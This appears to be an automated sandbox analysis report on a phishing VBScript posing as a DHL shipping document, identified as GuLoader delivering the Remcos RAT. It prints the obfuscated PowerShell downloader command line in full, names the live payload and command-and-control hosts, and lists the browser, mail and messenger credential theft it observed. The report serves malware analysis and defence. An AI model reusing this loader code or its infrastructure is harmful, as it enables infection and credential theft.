              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndigheJump to behavior
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.drBinary or memory string: [2024/07/01 10:19:54 Program Manager]
              Source: wab.exe, 0000000A.00000003.1988708190.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1987753034.00000000005D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlesj
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 54 Program Manager]
              Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerlesR
              Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.drBinary or memory string: [2024/07/01 10:20:03 Program Manager]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22933 cpuid 10_2_22B22933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_22B22264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,21_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041739B GetVersionExW,19_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword21_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword21_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword21_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1792, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		321
              Scripting              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              Registry Run Keys / Startup Folder              		212
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts212
              Command and Scripting Interpreter              		Login Hook1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Credentials In Files              		129
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		Network Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets1
              Query Registry              		SSH2
              Clipboard Data              		113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials341
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion              		DCSync141
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem4
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465419 Sample: DHL Shipping Document Awb &... Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 49 janbours92harbu02.duckdns.org 2->49 51 171.39.242.20.in-addr.arpa 2->51 53 2 other IPs or domains 2->53 73 Malicious sample detected (through community Yara rule) 2->73 75 Yara detected GuLoader 2->75 77 Yara detected Powershell download and execute 2->77 81 11 other signatures 2->81 11 wscript.exe 1 2->11         started        signatures3 79 Uses dynamic DNS services 49->79 process4 signatures5 83 VBScript performs obfuscated calls to suspicious functions 11->83 85 Suspicious powershell command line found 11->85 87 Wscript starts Powershell (via cmd or directly) 11->87 89 5 other signatures 11->89 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 59 contemega.com.do 192.185.112.252, 443, 49707, 60918 UNIFIEDLAYER-AS-1US United States 14->59 97 Suspicious powershell command line found 14->97 99 Obfuscated command line found 14->99 101 Very long command line found 14->101 103 Found suspicious powershell code related to unpacking or dynamic code loading 14->103 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 67 Writes to foreign memory regions 18->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 18->69 71 Hides threads from debuggers 18->71 25 wab.exe 8 16 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 55 janbours92harbu02.duckdns.org 206.123.148.194, 3981, 60919, 60920 M247GB United States 25->55 57 geoplugin.net 178.237.33.50, 60921, 80 ATOM86-ASATOM86NL Netherlands 25->57 45 C:\Users\user\AppData\Roaming\kpburtts.dat, data 25->45 dropped 47 C:\Users\...\memvbbncbrxabktzvniruuteatm.vbs, data 25->47 dropped 91 Maps a DLL or memory area into another process 25->91 93 Hides threads from debuggers 25->93 95 Installs a global keyboard hook 25->95 32 wab.exe 1 25->32         started        35 wab.exe 1 25->35         started        37 wab.exe 2 25->37         started        39 5 other processes 25->39 file13 signatures14 process15 signatures16 61 Tries to steal Instant Messenger accounts or passwords 32->61 63 Tries to steal Mail credentials (via file / registry access) 32->63 65 Tries to harvest and steal browser information (history, passwords, etc) 35->65 41 conhost.exe 39->41         started        43 reg.exe 1 1 39->43         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DHL Shipping Document Awb & BL.vbs5%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://contoso.com/License0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://moviesmacktalk.com/Nedsl0%Avira URL Cloudsafe
              https://contemega.Pb)m0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://contemega.com.d0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings.0%Avira URL Cloudsafe
              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P0%Avira URL Cloudsafe
              https://moviesmacktalk.c0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagn0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagning0%Avira URL Cloudsafe
              https://contemega.com.do/Neds0%Avira URL Cloudsafe
              https://contemega.com.do/N0%Avira URL Cloudsafe
              https://contemega.com.do0%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagnings.d0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslag0%Avira URL Cloudsafe
              http://www.imvu.coma0%Avira URL Cloudsafe
              https://contemega.c0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagnin0%Avira URL Cloudsafe
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnin0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://contemega.com.do/0%Avira URL Cloudsafe
              https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d900460%Avira URL Cloudsafe
              https://moviesmacktalk.com/Neds0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagning0%Avira URL Cloudsafe
              https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd160%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagnings.0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagni0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagni0%Avira URL Cloudsafe
              https://login.yahoo.com/config/login0%Avira URL Cloudsafe
              https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagnings.dw0%Avira URL Cloudsafe
              https://contemega.com.do/Nedsl0%Avira URL Cloudsafe
              https://contemega.com.0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              https://contemega.co0%Avira URL Cloudsafe
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
              https://contemega.com.do/Nedsla0%Avira URL Cloudsafe
              https://moviesmacktalk.com/0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings.d0%Avira URL Cloudsafe
